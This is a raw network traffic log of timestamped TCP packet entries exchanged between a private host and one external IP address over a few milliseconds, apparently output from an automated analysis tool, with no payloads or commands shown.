Jan 22, 2025 14:12:13.463304043 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463310957 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463341951 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463366032 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463392973 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463418007 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463418961 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463439941 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463444948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463474989 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463479996 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463510036 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463515043 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463530064 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463537931 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463565111 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463566065 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463591099 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463592052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463614941 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463618040 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463643074 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463644028 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463660002 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463670969 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463696003 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463696003 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463717937 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463721991 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463747978 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463747978 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463769913 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463774920 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463795900 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463800907 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463823080 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463825941 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463851929 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463852882 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463877916 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463880062 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463902950 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463906050 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463927031 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463932037 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463958025 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.463960886 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463975906 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.463984013 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464010000 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464011908 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464034081 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464035988 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464061975 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464087009 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464087963 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464111090 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464112997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464143991 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464148998 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464179993 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464198112 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464206934 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464225054 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464251041 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464260101 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464277029 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.464299917 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.464330912 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469279051 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469291925 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469301939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469312906 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469326019 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469352007 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469353914 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469377041 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469418049 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469439983 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469450951 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469465017 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469482899 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469496012 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469521046 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469549894 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469561100 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469568968 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469583988 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469610929 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469615936 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469630003 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469665051 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469719887 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469727993 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469748974 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469765902 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469784975 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469805956 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469829082 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469855070 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469863892 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469890118 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469911098 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469935894 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469944954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469960928 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469973087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469990015 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.469994068 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.469997883 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470016956 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470038891 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470043898 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470062017 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470082998 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470093012 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470119953 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470122099 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470127106 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470155954 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470155954 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470179081 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470200062 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470207930 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470216990 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470225096 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470252991 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470285892 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470285892 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470295906 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470320940 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470328093 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470339060 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470371962 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470413923 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470421076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470469952 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470521927 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470529079 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470556021 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470563889 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470571995 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470578909 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470582008 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470608950 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470617056 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470627069 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470649958 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470681906 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470683098 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470690966 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470736027 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470740080 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470750093 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470798969 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470812082 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470819950 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470860004 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470882893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470890999 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470897913 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470905066 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470936060 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470956087 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.470978975 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.470985889 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471005917 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471018076 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471065044 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471077919 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471106052 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471113920 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471144915 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471153021 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471163034 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471179962 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471187115 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471198082 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471225977 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471234083 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471235037 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471254110 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471267939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471287012 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471307039 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471347094 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471369982 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471410990 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471415997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471424103 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471478939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471482038 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471487045 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471534967 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471548080 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471555948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471605062 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471616030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471622944 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471671104 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471685886 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471698999 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471750975 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471792936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471801043 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471852064 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471888065 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471903086 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471920967 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471927881 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471930981 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471939087 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471956968 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471976995 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.471983910 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.471986055 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472007036 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472012043 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472013950 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472022057 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472048998 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472053051 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472055912 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472064018 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472080946 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472085953 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472093105 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472117901 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472131014 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472148895 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472157001 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472162008 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472170115 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472179890 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472183943 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472193003 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472230911 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472244024 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472251892 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472259998 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472287893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472295046 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472310066 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472332001 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472335100 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.472340107 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472374916 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472383976 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472387075 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472421885 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472429037 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472439051 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472459078 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472474098 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472487926 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472507954 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472541094 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472553015 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472559929 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472569942 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472578049 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472624063 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472642899 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472651005 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472665071 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472672939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472712994 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472733021 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472738028 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472740889 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472819090 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472832918 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472841024 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472847939 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472868919 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472877026 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472903967 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472912073 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472960949 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472980022 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472987890 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.472995043 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473021030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473028898 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473036051 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473043919 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473059893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473073959 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473081112 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473088980 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473125935 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473145008 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473154068 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473161936 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473187923 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473196030 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473203897 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473212004 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473225117 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473232031 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473263025 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473270893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473278046 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473284960 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473315001 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473323107 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473346949 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473355055 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473387957 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473395109 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473408937 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473417997 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473433018 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473439932 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473448038 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473491907 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473499060 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473506927 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473514080 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473521948 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473622084 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473629951 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473635912 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473644018 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473654985 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473683119 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473691940 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473702908 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473716974 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473723888 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473731041 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473737955 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.473757982 CET	55615	49740	45.137.22.227	192.168.2.4
